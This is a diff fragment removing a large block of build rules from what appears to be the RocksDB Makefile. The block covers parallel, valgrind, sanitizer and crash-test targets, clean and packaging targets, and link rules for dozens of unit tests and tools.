-# 152.120 PASS t/DBTest.FileCreationRandomFailure
-# 107.816 PASS t/DBTest.EncodeDecompressedBlockSizeTest
-#
-slow_test_regexp = \
-	^t/run-table_test-HarnessTest.Randomized$$|^t/run-db_test-.*(?:FileCreationRandomFailure|EncodeDecompressedBlockSizeTest)$$|^.*RecoverFromCorruptedWALWithoutFlush$$
-prioritize_long_running_tests =						\
-  perl -pe 's,($(slow_test_regexp)),100 $$1,'				\
-    | sort -k1,1gr							\
-    | sed 's/^[.0-9]* //'
-
-# "make check" uses
-# Run with "make J=1 check" to disable parallelism in "make check".
-# Run with "make J=200% check" to run two parallel jobs per core.
-# The default is to run one job per core (J=100%).
-# See "man parallel" for its "-j ..." option.
-J ?= 100%
-
-# Use this regexp to select the subset of tests whose names match.
-tests-regexp = .
-
-t_run = $(wildcard t/run-*)
-.PHONY: check_0
-check_0:
-	$(AM_V_GEN)export TEST_TMPDIR=$(TMPD); \
-	printf '%s\n' ''						\
-	  'To monitor subtest <duration,pass/fail,name>,'		\
-	  '  run "make watch-log" in a separate window' '';		\
-	test -t 1 && eta=--eta || eta=; \
-	{ \
-		printf './%s\n' $(filter-out $(PARALLEL_TEST),$(TESTS)); \
-		printf '%s\n' $(t_run); \
-	} \
-	  | $(prioritize_long_running_tests)				\
-	  | grep -E '$(tests-regexp)'					\
-	  | build_tools/gnu_parallel -j$(J) --plain --joblog=LOG $$eta --gnu '{} >& t/log-{/}'
-
-valgrind-blacklist-regexp = InlineSkipTest.ConcurrentInsert|TransactionTest.DeadlockStress|DBCompactionTest.SuggestCompactRangeNoTwoLevel0Compactions|BackupableDBTest.RateLimiting|DBTest.CloseSpeedup|DBTest.ThreadStatusFlush|DBTest.RateLimitingTest|DBTest.EncodeDecompressedBlockSizeTest|FaultInjectionTest.UninstalledCompaction|HarnessTest.Randomized|ExternalSSTFileTest.CompactDuringAddFileRandom|ExternalSSTFileTest.IngestFileWithGlobalSeqnoRandomized
-
-.PHONY: valgrind_check_0
-valgrind_check_0:
-	$(AM_V_GEN)export TEST_TMPDIR=$(TMPD);				\
-	printf '%s\n' ''						\
-	  'To monitor subtest <duration,pass/fail,name>,'		\
-	  '  run "make watch-log" in a separate window' '';		\
-	test -t 1 && eta=--eta || eta=;					\
-	{								\
-	  printf './%s\n' $(filter-out $(PARALLEL_TEST) %skiplist_test options_settable_test, $(TESTS));		\
-	  printf '%s\n' $(t_run);					\
-	}								\
-	  | $(prioritize_long_running_tests)				\
-	  | grep -E '$(tests-regexp)'					\
-	  | grep -E -v '$(valgrind-blacklist-regexp)'					\
-	  | build_tools/gnu_parallel -j$(J) --plain --joblog=LOG $$eta --gnu \
-	  '(if [[ "{}" == "./"* ]] ; then $(DRIVER) {}; else {}; fi) ' \
-	  '>& t/valgrind_log-{/}'
-
-CLEAN_FILES += t LOG $(TMPD)
-
-# When running parallel "make check", you can monitor its progress
-# from another window.
-# Run "make watch_LOG" to show the duration,PASS/FAIL,name of parallel
-# tests as they are being run.  We sort them so that longer-running ones
-# appear at the top of the list and any failing tests remain at the top
-# regardless of their duration. As with any use of "watch", hit ^C to
-# interrupt.
-watch-log:
-	watch --interval=0 'sort -k7,7nr -k4,4gr LOG|$(quoted_perl_command)'
-
-# If J != 1 and GNU parallel is installed, run the tests in parallel,
-# via the check_0 rule above.  Otherwise, run them sequentially.
-check: all
-	$(MAKE) gen_parallel_tests
-	$(AM_V_GEN)if test "$(J)" != 1                                  \
-	    && (build_tools/gnu_parallel --gnu --help 2>/dev/null) |                    \
-	        grep -q 'GNU Parallel';                                 \
-	then                                                            \
-	    $(MAKE) T="$$t" TMPD=$(TMPD) check_0;                       \
-	else                                                            \
-	    for t in $(TESTS); do                                       \
-	      echo "===== Running $$t"; ./$$t || exit 1; done;          \
-	fi
-	rm -rf $(TMPD)
-ifneq ($(PLATFORM), OS_AIX)
-ifeq ($(filter -DROCKSDB_LITE,$(OPT)),)
-	python tools/ldb_test.py
-	sh tools/rocksdb_dump_test.sh
-endif
-endif
-
-# TODO add ldb_tests
-check_some: $(SUBSET)
-	for t in $(SUBSET); do echo "===== Running $$t"; ./$$t || exit 1; done
-
-.PHONY: ldb_tests
-ldb_tests: ldb
-	python tools/ldb_test.py
-
-crash_test: whitebox_crash_test blackbox_crash_test
-
-blackbox_crash_test: db_stress
-	python -u tools/db_crashtest.py --simple blackbox $(CRASH_TEST_EXT_ARGS)
-	python -u tools/db_crashtest.py blackbox $(CRASH_TEST_EXT_ARGS)
-
-ifeq ($(CRASH_TEST_KILL_ODD),)
-  CRASH_TEST_KILL_ODD=888887
-endif
-
-whitebox_crash_test: db_stress
-	python -u tools/db_crashtest.py --simple whitebox --random_kill_odd \
-      $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS)
-	python -u tools/db_crashtest.py whitebox  --random_kill_odd \
-      $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS)
-
-asan_check:
-	$(MAKE) clean
-	COMPILE_WITH_ASAN=1 $(MAKE) check -j32
-	$(MAKE) clean
-
-asan_crash_test:
-	$(MAKE) clean
-	COMPILE_WITH_ASAN=1 $(MAKE) crash_test
-	$(MAKE) clean
-
-ubsan_check:
-	$(MAKE) clean
-	COMPILE_WITH_UBSAN=1 $(MAKE) check -j32
-	$(MAKE) clean
-
-ubsan_crash_test:
-	$(MAKE) clean
-	COMPILE_WITH_UBSAN=1 $(MAKE) crash_test
-	$(MAKE) clean
-
-valgrind_test:
-	DISABLE_JEMALLOC=1 $(MAKE) valgrind_check
-
-valgrind_check: $(TESTS)
-	$(MAKE) DRIVER="$(VALGRIND_VER) $(VALGRIND_OPTS)" gen_parallel_tests
-	$(AM_V_GEN)if test "$(J)" != 1                                  \
-	    && (build_tools/gnu_parallel --gnu --help 2>/dev/null) |                    \
-	        grep -q 'GNU Parallel';                                 \
-	then                                                            \
-      $(MAKE) TMPD=$(TMPD)                                        \
-      DRIVER="$(VALGRIND_VER) $(VALGRIND_OPTS)" valgrind_check_0; \
-	else                                                            \
-		for t in $(filter-out %skiplist_test options_settable_test,$(TESTS)); do \
-			$(VALGRIND_VER) $(VALGRIND_OPTS) ./$$t; \
-			ret_code=$$?; \
-			if [ $$ret_code -ne 0 ]; then \
-				exit $$ret_code; \
-			fi; \
-		done; \
-	fi
-
-
-ifneq ($(PAR_TEST),)
-parloop:
-	ret_bad=0;							\
-	for t in $(PAR_TEST); do		\
-		echo "===== Running $$t in parallel $(NUM_PAR)";\
-		if [ $(db_test) -eq 1 ]; then \
-			seq $(J) | v="$$t" build_tools/gnu_parallel --gnu --plain 's=$(TMPD)/rdb-{};  export TEST_TMPDIR=$$s;' \
-				'timeout 2m ./db_test --gtest_filter=$$v >> $$s/log-{} 2>1'; \
-		else\
-			seq $(J) | v="./$$t" build_tools/gnu_parallel --gnu --plain 's=$(TMPD)/rdb-{};' \
-			     'export TEST_TMPDIR=$$s; timeout 10m $$v >> $$s/log-{} 2>1'; \
-		fi; \
-		ret_code=$$?; \
-		if [ $$ret_code -ne 0 ]; then \
-			ret_bad=$$ret_code; \
-			echo $$t exited with $$ret_code; \
-		fi; \
-	done; \
-	exit $$ret_bad;
-endif
-
-test_names = \
-  ./db_test --gtest_list_tests						\
-    | perl -n								\
-      -e 's/ *\#.*//;'							\
-      -e '/^(\s*)(\S+)/; !$$1 and do {$$p=$$2; break};'			\
-      -e 'print qq! $$p$$2!'
-
-parallel_check: $(TESTS)
-	$(AM_V_GEN)if test "$(J)" > 1                                  \
-	    && (build_tools/gnu_parallel --gnu --help 2>/dev/null) |                    \
-	        grep -q 'GNU Parallel';                                 \
-	then                                                            \
-	    echo Running in parallel $(J);			\
-	else                                                            \
-	    echo "Need to have GNU Parallel and J > 1"; exit 1;		\
-	fi;								\
-	ret_bad=0;							\
-	echo $(J);\
-	echo Test Dir: $(TMPD); \
-        seq $(J) | build_tools/gnu_parallel --gnu --plain 's=$(TMPD)/rdb-{}; rm -rf $$s; mkdir $$s'; \
-	$(MAKE)  PAR_TEST="$(shell $(test_names))" TMPD=$(TMPD) \
-		J=$(J) db_test=1 parloop; \
-	$(MAKE) PAR_TEST="$(filter-out db_test, $(TESTS))" \
-		TMPD=$(TMPD) J=$(J) db_test=0 parloop;
-
-analyze: clean
-	$(CLANG_SCAN_BUILD) --use-analyzer=$(CLANG_ANALYZER) \
-		--use-c++=$(CXX) --use-cc=$(CC) --status-bugs \
-		-o $(CURDIR)/scan_build_report \
-		$(MAKE) dbg
-
-CLEAN_FILES += unity.cc
-unity.cc: Makefile
-	rm -f $@ $@-t
-	for source_file in $(LIB_SOURCES); do \
-		echo "#include \"$$source_file\"" >> $@-t; \
-	done
-	chmod a=r $@-t
-	mv $@-t $@
-
-unity.a: unity.o
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ unity.o
-
-# try compiling db_test with unity
-unity_test: db/db_test.o db/db_test_util.o $(TESTHARNESS) unity.a
-	$(AM_LINK)
-	./unity_test
-
-rocksdb.h rocksdb.cc: build_tools/amalgamate.py Makefile $(LIB_SOURCES) unity.cc
-	build_tools/amalgamate.py -I. -i./include unity.cc -x include/rocksdb/c.h -H rocksdb.h -o rocksdb.cc
-
-clean:
-	rm -f $(BENCHMARKS) $(TOOLS) $(TESTS) $(LIBRARY) $(SHARED)
-	rm -rf $(CLEAN_FILES) ios-x86 ios-arm scan_build_report
-	find . -name "*.[oda]" -exec rm -f {} \;
-	find . -type f -regex ".*\.\(\(gcda\)\|\(gcno\)\)" -exec rm {} \;
-	rm -rf bzip2* snappy* zlib* lz4* zstd*
-	cd java; $(MAKE) clean
-
-tags:
-	ctags * -R
-	cscope -b `find . -name '*.cc'` `find . -name '*.h'` `find . -name '*.c'`
-	ctags -e -R -o etags *
-
-format:
-	build_tools/format-diff.sh
-
-package:
-	bash build_tools/make_package.sh $(SHARED_MAJOR).$(SHARED_MINOR)
-
-# ---------------------------------------------------------------------------
-# 	Unit tests and tools
-# ---------------------------------------------------------------------------
-$(LIBRARY): $(LIBOBJECTS)
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ $(LIBOBJECTS)
-
-$(TOOLS_LIBRARY): $(BENCH_LIB_SOURCES:.cc=.o) $(TOOL_LIB_SOURCES:.cc=.o) $(LIB_SOURCES:.cc=.o) $(TESTUTIL)
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ $^
-
-librocksdb_env_basic_test.a: env/env_basic_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_AR)rm -f $@
-	$(AM_V_at)$(AR) $(ARFLAGS) $@ $^
-
-db_bench: tools/db_bench.o $(BENCHTOOLOBJECTS)
-	$(AM_LINK)
-
-cache_bench: cache/cache_bench.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-persistent_cache_bench: utilities/persistent_cache/persistent_cache_bench.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-memtablerep_bench: memtable/memtablerep_bench.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-db_stress: tools/db_stress.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-write_stress: tools/write_stress.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-db_sanity_test: tools/db_sanity_test.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-db_repl_stress: tools/db_repl_stress.o $(LIBOBJECTS) $(TESTUTIL)
-	$(AM_LINK)
-
-arena_test: util/arena_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-autovector_test: util/autovector_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-column_family_test: db/column_family_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-table_properties_collector_test: db/table_properties_collector_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-bloom_test: util/bloom_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-dynamic_bloom_test: util/dynamic_bloom_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-c_test: db/c_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cache_test: cache/cache_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-coding_test: util/coding_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-hash_test: util/hash_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-option_change_migration_test: utilities/option_change_migration/option_change_migration_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-stringappend_test: utilities/merge_operators/string_append/stringappend_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_format_test: utilities/cassandra/cassandra_format_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_functional_test: utilities/cassandra/cassandra_functional_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_row_merge_test: utilities/cassandra/cassandra_row_merge_test.o utilities/cassandra/test_utils.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cassandra_serialize_test: utilities/cassandra/cassandra_serialize_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-redis_test: utilities/redis/redis_lists_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-hash_table_test: utilities/persistent_cache/hash_table_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-histogram_test: monitoring/histogram_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-thread_local_test: util/thread_local_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-corruption_test: db/corruption_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-crc32c_test: util/crc32c_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-slice_transform_test: util/slice_transform_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_basic_test: db/db_basic_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_encryption_test: db/db_encryption_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_test: db/db_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_test2: db/db_test2.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_blob_index_test: db/db_blob_index_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_block_cache_test: db/db_block_cache_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_bloom_filter_test: db/db_bloom_filter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_log_iter_test: db/db_log_iter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_compaction_filter_test: db/db_compaction_filter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_compaction_test: db/db_compaction_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_dynamic_level_test: db/db_dynamic_level_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_flush_test: db/db_flush_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_inplace_update_test: db/db_inplace_update_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_iterator_test: db/db_iterator_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_memtable_test: db/db_memtable_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_merge_operator_test: db/db_merge_operator_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_options_test: db/db_options_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_range_del_test: db/db_range_del_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_sst_test: db/db_sst_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_statistics_test: db/db_statistics_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_write_test: db/db_write_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-external_sst_file_basic_test: db/external_sst_file_basic_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-external_sst_file_test: db/external_sst_file_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_tailing_iter_test: db/db_tailing_iter_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_iter_test: db/db_iter_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_universal_compaction_test: db/db_universal_compaction_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_wal_test: db/db_wal_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_io_failure_test: db/db_io_failure_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_properties_test: db/db_properties_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_table_properties_test: db/db_table_properties_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-log_write_bench: util/log_write_bench.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK) $(PROFILING_FLAGS)
-
-plain_table_db_test: db/plain_table_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-comparator_db_test: db/comparator_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-table_reader_bench: table/table_reader_bench.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK) $(PROFILING_FLAGS)
-
-perf_context_test: db/perf_context_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS)
-
-prefix_test: db/prefix_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS)
-
-backupable_db_test: utilities/backupable/backupable_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-checkpoint_test: utilities/checkpoint/checkpoint_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-document_db_test: utilities/document/document_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-json_document_test: utilities/document/json_document_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-sim_cache_test: utilities/simulator_cache/sim_cache_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-spatial_db_test: utilities/spatialdb/spatial_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_mirror_test: utilities/env_mirror_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_timed_test: utilities/env_timed_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ifdef ROCKSDB_USE_LIBRADOS
-env_librados_test: utilities/env_librados_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS) $(COVERAGEFLAGS)
-endif
-
-object_registry_test: utilities/object_registry_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ttl_test: utilities/ttl/ttl_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-date_tiered_test: utilities/date_tiered/date_tiered_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_batch_with_index_test: utilities/write_batch_with_index/write_batch_with_index_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-flush_job_test: db/flush_job_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_iterator_test: db/compaction_iterator_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_job_test: db/compaction_job_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_job_stats_test: db/compaction_job_stats_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compact_on_deletion_collector_test: utilities/table_properties_collectors/compact_on_deletion_collector_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-wal_manager_test: db/wal_manager_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-dbformat_test: db/dbformat_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_basic_test: env/env_basic_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-env_test: env/env_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-fault_injection_test: db/fault_injection_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-rate_limiter_test: util/rate_limiter_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-delete_scheduler_test: util/delete_scheduler_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-filename_test: db/filename_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-file_reader_writer_test: util/file_reader_writer_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-block_based_filter_block_test: table/block_based_filter_block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-full_filter_block_test: table/full_filter_block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-partitioned_filter_block_test: table/partitioned_filter_block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-log_test: db/log_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cleanable_test: table/cleanable_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-table_test: table/table_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-block_test: table/block_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-inlineskiplist_test: memtable/inlineskiplist_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-skiplist_test: memtable/skiplist_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_buffer_manager_test: memtable/write_buffer_manager_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-version_edit_test: db/version_edit_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-version_set_test: db/version_set_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compaction_picker_test: db/compaction_picker_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-version_builder_test: db/version_builder_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-file_indexer_test: db/file_indexer_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-reduce_levels_test: tools/reduce_levels_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_batch_test: db/write_batch_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_controller_test: db/write_controller_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-merge_helper_test: db/merge_helper_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-memory_test: utilities/memory/memory_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-merge_test: db/merge_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-merger_test: table/merger_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-util_merge_operators_test: utilities/util_merge_operators_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_file_test: db/options_file_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-deletefile_test: db/deletefile_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-geodb_test: utilities/geodb/geodb_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-rocksdb_dump: tools/dump/rocksdb_dump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-rocksdb_undump: tools/dump/rocksdb_undump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-cuckoo_table_builder_test: table/cuckoo_table_builder_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cuckoo_table_reader_test: table/cuckoo_table_reader_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-cuckoo_table_db_test: db/cuckoo_table_db_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-listener_test: db/listener_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-thread_list_test: util/thread_list_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-compact_files_test: db/compact_files_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_test: options/options_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_settable_test: options/options_settable_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-options_util_test: utilities/options/options_util_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-db_bench_tool_test: tools/db_bench_tool_test.o $(BENCHTOOLOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-event_logger_test: util/event_logger_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-timer_queue_test: util/timer_queue_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-sst_dump_test: tools/sst_dump_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-column_aware_encoding_test: utilities/column_aware_encoding_test.o $(TESTHARNESS) $(EXPOBJECTS)
-	$(AM_LINK)
-
-optimistic_transaction_test: utilities/transactions/optimistic_transaction_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-mock_env_test : env/mock_env_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-manual_compaction_test: db/manual_compaction_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-filelock_test: util/filelock_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-auto_roll_logger_test: util/auto_roll_logger_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-memtable_list_test: db/memtable_list_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-write_callback_test: db/write_callback_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-heap_test: util/heap_test.o $(GTEST)
-	$(AM_LINK)
-
-transaction_test: utilities/transactions/transaction_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-sst_dump: tools/sst_dump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-blob_dump: tools/blob_dump.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-column_aware_encoding_exp: utilities/column_aware_encoding_exp.o $(EXPOBJECTS)
-	$(AM_LINK)
-
-repair_test: db/repair_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ldb_cmd_test: tools/ldb_cmd_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-ldb: tools/ldb.o $(LIBOBJECTS)
-	$(AM_LINK)
-
-iostats_context_test: monitoring/iostats_context_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_V_CCLD)$(CXX) $^ $(EXEC_LDFLAGS) -o $@ $(LDFLAGS)
-
-persistent_cache_test: utilities/persistent_cache/persistent_cache_test.o  db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
-
-statistics_test: monitoring/statistics_test.o $(LIBOBJECTS) $(TESTHARNESS)
-	$(AM_LINK)
